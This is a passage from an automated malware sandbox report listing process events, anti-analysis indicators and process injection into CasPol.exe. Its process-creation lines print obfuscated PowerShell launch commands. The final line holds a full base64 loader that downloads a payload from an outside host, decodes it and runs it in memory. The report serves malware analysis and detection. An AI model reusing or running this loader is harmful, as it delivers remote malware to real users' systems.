                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (108 identical entries collapsed)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Process information set: NOOPENFILEERRORBOX (6 identical entries collapsed)

                    Malware Analysis System Evasion

                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_0040E54F Sleep,ExitProcess
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_004198C2 OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (4 identical entries collapsed)
                    Source: C:\Windows\SysWOW64\wscript.exe | Window found: window name: WSH-Timer
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5296
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4448
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6853
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2607
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1464
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 560
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3215
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6534
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Window / User API: threadDelayed 509
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Window / User API: threadDelayed 9003
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Window / User API: foregroundWindowGot 1765
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2c1bgmxj\2c1bgmxj.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7380 | Thread sleep time: -18446744073709540s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5084 | Thread sleep count: 6853 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6700 | Thread sleep count: 2607 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7164 | Thread sleep time: -10145709240540247s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7696 | Thread sleep count: 1464 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7696 | Thread sleep count: 560 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7712 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7780 | Thread sleep count: 3215 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7780 | Thread sleep count: 6534 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7824 | Thread sleep time: -20291418481080494s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8084 | Thread sleep count: 232 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8084 | Thread sleep time: -116000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8088 | Thread sleep count: 509 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8088 | Thread sleep time: -1527000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8088 | Thread sleep count: 9003 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8088 | Thread sleep time: -27009000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_0044D5E9 FindFirstFileExA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_00406AC2 FindFirstFileW,FindNextFileW
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (4 identical entries collapsed)
                    Source: powershell.exe, 00000003.00000002.1303936513.00000000054C6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Remove-NetEventVmNetworkAdapter
                    Source: mshta.exe, 00000000.00000002.1289334698.00000000056A0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\l
                    Source: wscript.exe, 0000000D.00000002.1393834666.0000000005010000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
                    Source: powershell.exe, 00000003.00000002.1303936513.00000000054C6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Add-NetEventVmNetworkAdapter
                    Source: powershell.exe, 00000010.00000002.1716425597.00000000073ED000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll0
                    Source: powershell.exe, 00000001.00000002.1427293959.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1423686161.0000000007AA5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1424337882.0000000007ABE000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000012.00000002.3689257366.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000012.00000002.3692299440.0000000000C71000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                    Source: powershell.exe, 00000003.00000002.1302780296.00000000034A8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: FnsTraceSession", "Stop-DtMSFT_NetEventVmNetworkAdatper.cdxmlWrit
                    Source: CasPol.exe, 00000012.00000002.3692299440.0000000000C71000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW,
                    Source: powershell.exe, 00000003.00000002.1303936513.00000000054C6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Get-NetEventVmNetworkAdapter
                    Source: powershell.exe, 00000003.00000002.1302780296.00000000034A8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Vom/fwlink/?LinkID=390791"MSFT_NetEventVmNetworkAdatper.format.ps1xml
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | API call chain: ExitProcess graph end node | graph_18-48194
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_00442554 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_0044E92E GetProcessHeap
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug (4 identical entries collapsed)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_00433CD7 SetUnhandledExceptionFilter

                    HIPS / PFW / Operating System Protection Evasion

                    Source: Yara match | File source: amsi32_7724.amsi.csv, type: OTHER
                    Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7724, type: MEMORYSTR
                    Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 401000
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 457000
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 470000
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 476000
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 47B000
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 6BC008
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_00410F36 GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_00418754 mouse_event
                    Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'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'+[chaR]34+'))')))"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2c1bgmxj\2c1bgmxj.cmdline"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES883E.tmp" "c:\Users\user\AppData\Local\Temp\2c1bgmxj\CSC89B293BFADB94B3BBFCBA07F5ADB38CA.TMP"
                    Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICR2ZXJCb1NlcHJFRmVyZU5DZS5UT3N0ckluRygpWzEsM10rJ1gnLUpPaU4nJykoKCdvcGlpbWFnZVVybCA9IGlmZGh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0JysnNXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9JysnZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgaWZkO29waXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7b3BpaW1hZ2VCeXRlcyA9IG9waXdlYkNsaWVudC5Eb3dubG9hZERhdGEob3BpaW1hZ2VVcmwpO29waWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKG8nKydwaWltYWdlQnl0ZXMpO29waXN0YXJ0RmxhZyA9IGlmZDw8QkFTRTY0X1NUQVJUPj5pZmQ7b3BpZW5kRmxhZyA9IGlmZDw8QkFTRTY0X0VORD4+aWZkO29waXN0YXJ0SW5kZXggPSBvcGlpbWFnZVRleHQuSW5kZXhPZihvJysncGlzJysndGFydEZsYWcpO29waWVuZEluZGV4ID0gb3BpaW1hZ2VUZXh0LkluZGV4T2Yob3BpZW5kRmxhZyk7b3Bpc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIG9waWVuZEluZGV4IC1ndCBvcGlzdGFydEluZGUnKyd4O29waXN0YXJ0SW5kZXggKz0gb3Bpc3RhcnRGbGFnLkxlbmd0aDtvcCcrJ2liYXNlNjRMZW5ndGggPSBvcGllbmRJbmRleCAtIG9waXN0YXJ0SW5kZXg7b3BpYmFzZTY0Q29tbWFuZCA9IG9waWltYWdlVGV4dC5TdWJzdCcrJ3Jpbmcob3Bpc3RhcnQnKydJbmRleCwgb3BpYmFzZTY0TGVuZ3RoKTtvcGliYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChvcGliYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgMFEnKydsIEZvckVhY2gtT2JqZWN0IHsgb3BpXyB9KVsnKyctMS4uLShvcGliYXNlNjRDb21tYW5kLkxlbmd0aCldO29waWNvbW1hbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udicrJ2UnKydydF06OkZyb21CYXNlJysnNjRTdHJpbmcob3BpYmFzZTY0UmV2ZXJzZWQpO29waWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW8nKyduLkFzc2VtYmx5XTo6TG9hZChvcGljb21tYW5kQnl0ZXMpO29waXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoaWYnKydkVkFJaWZkJysnKTtvcGl2YWlNZXRob2QuSW52b2tlKG9waW51bGwsIEAoaWZkdHh0LkdERFJESC81NC85Mi4nKycwMjIuMy4yOTEvLzpwdHRoaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRDYXNQb2xpZmQsIGlmZGRlc2F0aXYnKydhZG8nKydpZmQsIGlmZGRlc2F0JysnaXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdGl2YWRvaWZkLGlmZGRlc2F0aXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdCcrJ2l2YWRvaWZkLGlmZDFpZmQsaWZkZGVzYXRpdmFkb2lmJysnZCkpOycpLnJlUExBQ2UoJzBRbCcsW1N0cmluR11bQ2hBcl0xMjQpLnJlUExBQ2UoJ2lmZCcsW1N0cmluR11bQ2hBcl0zOSkucmVQTEFDZSgoW0NoQXJdMTExK1tDaEFyXTExMitbQ2hBcl0xMDUpLCckJykp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
